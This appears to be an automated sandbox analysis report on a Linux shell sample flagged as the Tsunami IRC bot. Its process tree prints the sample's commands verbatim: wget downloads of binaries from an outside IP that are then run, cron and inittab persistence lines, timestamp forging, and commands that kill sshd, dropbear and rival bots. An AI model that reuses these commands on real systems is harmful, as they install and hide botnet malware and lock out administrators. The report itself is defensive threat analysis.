Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 1.sh

Overview

General Information

Sample Name:1.sh
Analysis ID:375765
MD5:65fc26f78151a04e71dd86ca38cf4fd2
SHA1:3adf311b9e97dac5ccd95cf9c992c17e5c3ffabd
SHA256:864d438887ea34ffd06b03695267e93b48e73ec0f39d047968a1cce44448c581
Infos:

Detection

Tsunami
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Tsunami
Executes the "crontab" command typically for achieving persistence
Explicitly modifies time stamps using the "touch" command
Machine Learning detection for dropped file
Sample tries to persist itself using System V runlevels
Sample tries to persist itself using cron
Terminates several processes with shell command 'killall'
Uses IRC for communication with a C&C
Uses known network protocols on non-standard ports
Writes identical ELF files to multiple locations
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "grep" command used to find patterns in files or piped streams
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Executes the "touch" command used to create files or modify time stamps
Executes the "wget" command typically used for HTTP/S downloading
Sample contains strings that are potentially command strings
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes crontab like entries to files to /var or /etc typically for achieving persistence
Yara signature match

Classification

Startup

  • system is lnxubuntu1
  • sh (PID: 4579, Parent: 4518, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh /tmp/1.sh
    • sh New Fork (PID: 4581, Parent: 4579)
    • wget (PID: 4581, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/tty0 -O /var/run/tty0
    • sh New Fork (PID: 4605, Parent: 4579)
    • chmod (PID: 4605, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/tty0
    • sh New Fork (PID: 4606, Parent: 4579)
    • chmod (PID: 4606, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/tty0
    • sh New Fork (PID: 4607, Parent: 4579)
    • sh New Fork (PID: 4608, Parent: 4579)
    • wget (PID: 4608, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/tty1 -O /var/run/tty1
    • sh New Fork (PID: 4637, Parent: 4579)
    • chmod (PID: 4637, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/tty1
    • sh New Fork (PID: 4639, Parent: 4579)
    • chmod (PID: 4639, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/tty1
    • sh New Fork (PID: 4643, Parent: 4579)
    • sh New Fork (PID: 4644, Parent: 4579)
    • wget (PID: 4644, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/tty2 -O /var/run/tty2
    • sh New Fork (PID: 4669, Parent: 4579)
    • chmod (PID: 4669, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/tty2
    • sh New Fork (PID: 4670, Parent: 4579)
    • chmod (PID: 4670, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/tty2
    • sh New Fork (PID: 4671, Parent: 4579)
    • sh New Fork (PID: 4672, Parent: 4579)
    • wget (PID: 4672, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/tty3 -O /var/run/tty3
    • sh New Fork (PID: 4701, Parent: 4579)
    • chmod (PID: 4701, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/tty3
    • sh New Fork (PID: 4702, Parent: 4579)
    • chmod (PID: 4702, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/tty3
    • sh New Fork (PID: 4704, Parent: 4579)
    • sh New Fork (PID: 4705, Parent: 4579)
    • wget (PID: 4705, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/tty4 -O /var/run/tty4
    • sh New Fork (PID: 4733, Parent: 4579)
    • chmod (PID: 4733, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/tty4
    • sh New Fork (PID: 4734, Parent: 4579)
    • chmod (PID: 4734, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/tty4
    • sh New Fork (PID: 4735, Parent: 4579)
    • sh New Fork (PID: 4736, Parent: 4579)
    • wget (PID: 4736, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/tty5 -O /var/run/tty5
    • sh New Fork (PID: 4765, Parent: 4579)
    • chmod (PID: 4765, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/tty5
    • sh New Fork (PID: 4766, Parent: 4579)
    • chmod (PID: 4766, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/tty5
    • sh New Fork (PID: 4767, Parent: 4579)
    • sh New Fork (PID: 4768, Parent: 4579)
    • wget (PID: 4768, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/tty6 -O /var/run/tty6
    • sh New Fork (PID: 4797, Parent: 4579)
    • chmod (PID: 4797, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/tty6
    • sh New Fork (PID: 4798, Parent: 4579)
    • chmod (PID: 4798, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/tty6
    • sh New Fork (PID: 4799, Parent: 4579)
    • sh New Fork (PID: 4800, Parent: 4579)
    • wget (PID: 4800, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/pty -O pty
    • sh New Fork (PID: 4829, Parent: 4579)
    • chmod (PID: 4829, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x pty
    • sh New Fork (PID: 4830, Parent: 4579)
    • chmod (PID: 4830, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 pty
    • sh New Fork (PID: 4831, Parent: 4579)
    • pty (PID: 4831, Parent: 4579, MD5: unknown) Arguments: ./pty
      • pty New Fork (PID: 4846, Parent: 4831)
        • pty New Fork (PID: 4849, Parent: 4846)
        • sh (PID: 4849, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /var/run/wgsh > /dev/null 2>&1 &"
          • sh New Fork (PID: 4851, Parent: 4849)
          • rm (PID: 4851, Parent: 4849, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/wgsh
        • pty New Fork (PID: 4857, Parent: 4846)
        • sh (PID: 4857, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /var/run/bbsh > /dev/null 2>&1 &"
          • sh New Fork (PID: 4863, Parent: 4857)
          • rm (PID: 4863, Parent: 4857, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/bbsh
        • pty New Fork (PID: 4867, Parent: 4846)
        • sh (PID: 4867, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /var/run/pty > /dev/null 2>&1 &"
          • sh New Fork (PID: 4891, Parent: 4867)
          • rm (PID: 4891, Parent: 4867, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/pty
        • pty New Fork (PID: 4899, Parent: 4846)
        • sh (PID: 4899, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 arm > /dev/null 2>&1 &"
          • sh New Fork (PID: 4902, Parent: 4899)
          • killall (PID: 4902, Parent: 4899, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 arm
        • pty New Fork (PID: 4906, Parent: 4846)
        • sh (PID: 4906, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 mips > /dev/null 2>&1 &"
          • sh New Fork (PID: 4917, Parent: 4906)
          • killall (PID: 4917, Parent: 4906, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 mips
        • pty New Fork (PID: 4921, Parent: 4846)
        • sh (PID: 4921, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 mipsel > /dev/null 2>&1 &"
          • sh New Fork (PID: 4931, Parent: 4921)
          • killall (PID: 4931, Parent: 4921, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 mipsel
        • pty New Fork (PID: 4935, Parent: 4846)
        • sh (PID: 4935, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 powerpc > /dev/null 2>&1 &"
          • sh New Fork (PID: 4940, Parent: 4935)
          • killall (PID: 4940, Parent: 3310, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 powerpc
        • pty New Fork (PID: 4942, Parent: 4846)
        • sh (PID: 4942, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 ppc > /dev/null 2>&1 &"
          • sh New Fork (PID: 4947, Parent: 4942)
          • killall (PID: 4947, Parent: 4942, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 ppc
        • pty New Fork (PID: 4951, Parent: 4846)
        • sh (PID: 4951, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 daemon.armv4l.mod > /dev/null 2>&1 &"
          • sh New Fork (PID: 4963, Parent: 4951)
          • killall (PID: 4963, Parent: 4951, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 daemon.armv4l.mod
        • pty New Fork (PID: 4966, Parent: 4846)
        • sh (PID: 4966, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 daemon.i686.mod > /dev/null 2>&1 &"
          • sh New Fork (PID: 4987, Parent: 4966)
          • killall (PID: 4987, Parent: 3310, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 daemon.i686.mod
        • pty New Fork (PID: 4990, Parent: 4846)
        • sh (PID: 4990, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 daemon.mips.mod > /dev/null 2>&1 &"
          • sh New Fork (PID: 4999, Parent: 4990)
          • killall (PID: 4999, Parent: 4990, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 daemon.mips.mod
        • pty New Fork (PID: 5012, Parent: 4846)
        • sh (PID: 5012, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 daemon.mipsel.mod > /dev/null 2>&1 &"
          • sh New Fork (PID: 5027, Parent: 5012)
          • killall (PID: 5027, Parent: 5012, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 daemon.mipsel.mod
        • pty New Fork (PID: 5030, Parent: 4846)
        • sh (PID: 5030, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "kill -9 `cat /tmp/.xs/*.pid` > /dev/null 2>&1 &"
          • sh New Fork (PID: 5055, Parent: 5030)
            • sh New Fork (PID: 5063, Parent: 5055)
            • cat (PID: 5063, Parent: 5055, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /tmp/.xs/*.pid
        • pty New Fork (PID: 5057, Parent: 4846)
        • sh (PID: 5057, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /tmp/.xs/* > /dev/null 2>&1 &"
          • sh New Fork (PID: 5070, Parent: 5057)
          • rm (PID: 5070, Parent: 3310, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /tmp/.xs/*
        • pty New Fork (PID: 5080, Parent: 4846)
        • sh (PID: 5080, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "chmod 700 /tmp/pty > /dev/null 2>&1 &"
          • sh New Fork (PID: 5086, Parent: 5080)
          • chmod (PID: 5086, Parent: 5080, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /tmp/pty
        • pty New Fork (PID: 5090, Parent: 4846)
        • sh (PID: 5090, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "touch -acmr /bin/ls /tmp/pty"
          • sh New Fork (PID: 5103, Parent: 5090)
          • touch (PID: 5103, Parent: 5090, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/ls /tmp/pty
        • pty New Fork (PID: 5130, Parent: 4846)
        • sh (PID: 5130, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "(crontab -l | grep -v \"/tmp/pty\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x001804289383) > /dev/null 2>&1"
          • sh New Fork (PID: 5142, Parent: 5130)
            • sh New Fork (PID: 5154, Parent: 5142)
            • crontab (PID: 5154, Parent: 5142, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab -l
            • sh New Fork (PID: 5155, Parent: 5142)
            • grep (PID: 5155, Parent: 5142, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v /tmp/pty
            • sh New Fork (PID: 5156, Parent: 5142)
            • grep (PID: 5156, Parent: 5142, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v "no cron"
            • sh New Fork (PID: 5157, Parent: 5142)
            • grep (PID: 5157, Parent: 5142, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v lesshts/run.sh
        • pty New Fork (PID: 5201, Parent: 4846)
        • sh (PID: 5201, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "echo \"* * * * * /tmp/pty > /dev/null 2>&1 &\" >> /var/run/.x001804289383"
        • pty New Fork (PID: 5202, Parent: 4846)
        • sh (PID: 5202, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "crontab /var/run/.x001804289383"
          • sh New Fork (PID: 5204, Parent: 5202)
          • crontab (PID: 5204, Parent: 5202, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab /var/run/.x001804289383
        • pty New Fork (PID: 5228, Parent: 4846)
        • sh (PID: 5228, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /var/run/.x001804289383"
          • sh New Fork (PID: 5230, Parent: 5228)
          • rm (PID: 5230, Parent: 5228, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/.x001804289383
        • pty New Fork (PID: 5239, Parent: 4846)
        • sh (PID: 5239, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 5243, Parent: 5239)
          • uname (PID: 5243, Parent: 5239, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • pty New Fork (PID: 5264, Parent: 4846)
        • sh (PID: 5264, Parent: 4846, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 5265, Parent: 5264)
          • uname (PID: 5265, Parent: 5264, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • pty New Fork (PID: 8337, Parent: 4846)
          • pty New Fork (PID: 8338, Parent: 8337)
          • sh (PID: 8338, Parent: 8337, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; killall -9 sshd dropbear ; kill -9 `pidof sshd` `pidof dropbear` )>/dev/null 2>&1 & "
            • sh New Fork (PID: 8339, Parent: 8338)
              • sh New Fork (PID: 8340, Parent: 8339)
              • cat (PID: 8340, Parent: 8339, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/dropbear.pid
              • sh New Fork (PID: 8341, Parent: 8339)
              • cat (PID: 8341, Parent: 8339, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/sshd.pid
              • sh New Fork (PID: 8342, Parent: 8339)
              • killall (PID: 8342, Parent: 8339, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 sshd dropbear
              • sh New Fork (PID: 8375, Parent: 8339)
              • pidof (PID: 8375, Parent: 8339, MD5: 1927a3fb9f656f7b53b72c92cbbecfe9) Arguments: pidof sshd
              • sh New Fork (PID: 8384, Parent: 8339)
              • pidof (PID: 8384, Parent: 8339, MD5: 1927a3fb9f656f7b53b72c92cbbecfe9) Arguments: pidof dropbear
    • sh New Fork (PID: 4832, Parent: 4579)
    • wget (PID: 4832, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/irq0 -O irq0
    • sh New Fork (PID: 5282, Parent: 4579)
    • chmod (PID: 5282, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x irq0
    • sh New Fork (PID: 5283, Parent: 4579)
    • chmod (PID: 5283, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 irq0
    • sh New Fork (PID: 5285, Parent: 4579)
    • irq0 (PID: 5285, Parent: 4579, MD5: unknown) Arguments: /usr/bin/qemu-arm ./irq0
      • irq0 New Fork (PID: 5319, Parent: 5285)
      • sh (PID: 5319, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "chmod 700 /tmp/irq0 > /dev/null 2>&1 &"
        • sh New Fork (PID: 5321, Parent: 5319)
        • chmod (PID: 5321, Parent: 5319, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /tmp/irq0
      • irq0 New Fork (PID: 5322, Parent: 5285)
      • sh (PID: 5322, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "touch -acmr /bin/ls /tmp/irq0"
        • sh New Fork (PID: 5324, Parent: 5322)
        • touch (PID: 5324, Parent: 5322, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/ls /tmp/irq0
      • irq0 New Fork (PID: 5325, Parent: 5285)
      • sh (PID: 5325, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "(crontab -l | grep -v \"/tmp/irq0\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1"
        • sh New Fork (PID: 5327, Parent: 5325)
          • sh New Fork (PID: 5328, Parent: 5327)
          • crontab (PID: 5328, Parent: 5327, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab -l
          • sh New Fork (PID: 5329, Parent: 5327)
          • grep (PID: 5329, Parent: 5327, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v /tmp/irq0
          • sh New Fork (PID: 5330, Parent: 5327)
          • grep (PID: 5330, Parent: 5327, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v "no cron"
          • sh New Fork (PID: 5331, Parent: 5327)
          • grep (PID: 5331, Parent: 5327, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v lesshts/run.sh
      • irq0 New Fork (PID: 5404, Parent: 5285)
      • sh (PID: 5404, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "echo \"* * * * * /tmp/irq0 > /dev/null 2>&1 &\" >> /var/run/.x00740882966"
      • irq0 New Fork (PID: 5406, Parent: 5285)
      • sh (PID: 5406, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "crontab /var/run/.x00740882966"
        • sh New Fork (PID: 5408, Parent: 5406)
        • crontab (PID: 5408, Parent: 5406, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab /var/run/.x00740882966
      • irq0 New Fork (PID: 5415, Parent: 5285)
      • sh (PID: 5415, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /var/run/.x00740882966"
        • sh New Fork (PID: 5441, Parent: 5415)
        • rm (PID: 5441, Parent: 5415, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/.x00740882966
      • irq0 New Fork (PID: 5444, Parent: 5285)
      • sh (PID: 5444, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cat /etc/inittab | grep -v \"/tmp/irq0\" > /etc/inittab2"
        • sh New Fork (PID: 5446, Parent: 5444)
        • cat (PID: 5446, Parent: 5444, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /etc/inittab
        • sh New Fork (PID: 5447, Parent: 5444)
        • grep (PID: 5447, Parent: 5444, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v /tmp/irq0
      • irq0 New Fork (PID: 5449, Parent: 5285)
      • sh (PID: 5449, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "echo \"0:2345:respawn:/tmp/irq0\" >> /etc/inittab2"
      • irq0 New Fork (PID: 5490, Parent: 5285)
      • sh (PID: 5490, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"
        • sh New Fork (PID: 5492, Parent: 5490)
        • cat (PID: 5492, Parent: 5490, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /etc/inittab2
      • irq0 New Fork (PID: 5493, Parent: 5285)
      • sh (PID: 5493, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /etc/inittab2"
        • sh New Fork (PID: 5520, Parent: 5493)
        • rm (PID: 5520, Parent: 5493, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /etc/inittab2
      • irq0 New Fork (PID: 5523, Parent: 5285)
      • sh (PID: 5523, Parent: 5285, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"
        • sh New Fork (PID: 5525, Parent: 5523)
        • touch (PID: 5525, Parent: 5523, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/ls /etc/inittab
      • irq0 New Fork (PID: 5526, Parent: 5285)
        • irq0 New Fork (PID: 5529, Parent: 5526)
        • sh (PID: 5529, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 5562, Parent: 5529)
          • uname (PID: 5562, Parent: 5529, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • irq0 New Fork (PID: 5563, Parent: 5526)
        • sh (PID: 5563, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 5565, Parent: 5563)
          • uname (PID: 5565, Parent: 5563, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • irq0 New Fork (PID: 5566, Parent: 5526)
        • sh (PID: 5566, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 5568, Parent: 5566)
          • uname (PID: 5568, Parent: 5566, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • irq0 New Fork (PID: 5609, Parent: 5526)
        • sh (PID: 5609, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"
          • sh New Fork (PID: 5611, Parent: 5609)
            • sh New Fork (PID: 5612, Parent: 5611)
            • cat (PID: 5612, Parent: 5611, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/httpd.pid
        • irq0 New Fork (PID: 5613, Parent: 5526)
        • sh (PID: 5613, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "service httpd stop > /dev/null 2>&1 &"
          • sh New Fork (PID: 5615, Parent: 5613)
          • service (PID: 5615, Parent: 3310, MD5: 81c4fe604ec67916db7b223725e5a9c6) Arguments: /bin/sh /usr/sbin/service httpd stop
            • service New Fork (PID: 5621, Parent: 5615)
            • basename (PID: 5621, Parent: 5615, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5670, Parent: 5615)
            • basename (PID: 5670, Parent: 5615, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5695, Parent: 5615)
            • systemctl (PID: 5695, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 5745, Parent: 5615)
              • service New Fork (PID: 5746, Parent: 5745)
              • systemctl (PID: 5746, Parent: 5745, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 5747, Parent: 5745)
              • sed (PID: 5747, Parent: 5745, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • service New Fork (PID: 6015, Parent: 5615)
            • systemctl (PID: 6015, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show acpid.socket
            • service New Fork (PID: 6062, Parent: 5615)
            • systemctl (PID: 6062, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show apport-forward.socket
            • service New Fork (PID: 6323, Parent: 5615)
            • systemctl (PID: 6323, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show avahi-daemon.socket
            • service New Fork (PID: 6387, Parent: 5615)
            • systemctl (PID: 6387, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show cups.socket
            • service New Fork (PID: 6443, Parent: 5615)
            • systemctl (PID: 6443, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dbus.socket
            • service New Fork (PID: 6520, Parent: 5615)
            • systemctl (PID: 6520, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dm-event.socket
            • service New Fork (PID: 6558, Parent: 5615)
            • systemctl (PID: 6558, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmetad.socket
            • service New Fork (PID: 6612, Parent: 5615)
            • systemctl (PID: 6612, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmpolld.socket
            • service New Fork (PID: 6648, Parent: 5615)
            • systemctl (PID: 6648, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lxd.socket
            • service New Fork (PID: 6675, Parent: 5615)
            • systemctl (PID: 6675, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show saned.socket
            • service New Fork (PID: 6710, Parent: 5615)
            • systemctl (PID: 6710, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show snapd.socket
            • service New Fork (PID: 6733, Parent: 5615)
            • systemctl (PID: 6733, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show ssh.socket
            • service New Fork (PID: 6762, Parent: 5615)
            • systemctl (PID: 6762, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show syslog.socket
            • service New Fork (PID: 6783, Parent: 5615)
            • systemctl (PID: 6783, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-bus-proxyd.socket
            • service New Fork (PID: 6818, Parent: 5615)
            • systemctl (PID: 6818, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-fsckd.socket
            • service New Fork (PID: 6845, Parent: 5615)
            • systemctl (PID: 6845, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-initctl.socket
            • service New Fork (PID: 6872, Parent: 5615)
            • systemctl (PID: 6872, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-audit.socket
            • service New Fork (PID: 6899, Parent: 5615)
            • systemctl (PID: 6899, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-dev-log.socket
            • service New Fork (PID: 6926, Parent: 5615)
            • systemctl (PID: 6926, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald.socket
            • service New Fork (PID: 6953, Parent: 5615)
